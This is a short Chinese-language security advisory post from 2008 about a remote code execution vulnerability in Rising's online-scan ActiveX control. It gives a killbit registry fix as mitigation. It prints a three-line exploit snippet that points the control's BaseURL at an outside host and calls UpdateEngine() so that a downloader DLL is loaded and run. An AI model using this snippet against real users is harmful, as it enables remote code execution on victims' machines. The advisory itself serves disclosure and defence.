知道安全

发布日期：2008-02-05

经过测试DEMO发现,黑客可通过编写DLL型的Downloader ,利用以下代码进行调用来执行指令:

rav.BaseURL = “http://www.scanw.com/“;
rav.Encardid = “0000$0000$0000″;
rav.UpdateEngine();

描述：

瑞星在线扫描在处理UpdateEngine的时候存在漏洞，如果用户执行了带有该恶意脚本的页面，就可能导致执行任意指令。<*来源：http://www.milw0rm.com/exploits/5188
测试页面：http://www.milw0rm.com/exploit.php?id=5188
*>

目前瑞星尚未修复此漏洞. 临时解决方案:给{E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153}设置killbit.

Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153}]
“Compatibility Flags”=dword:00000400

Popularity: 10% [?]

我们提供更安全的互联网

瑞星在线扫描远程代码执行漏洞

Leave a Reply

Categories

Monthly

Pages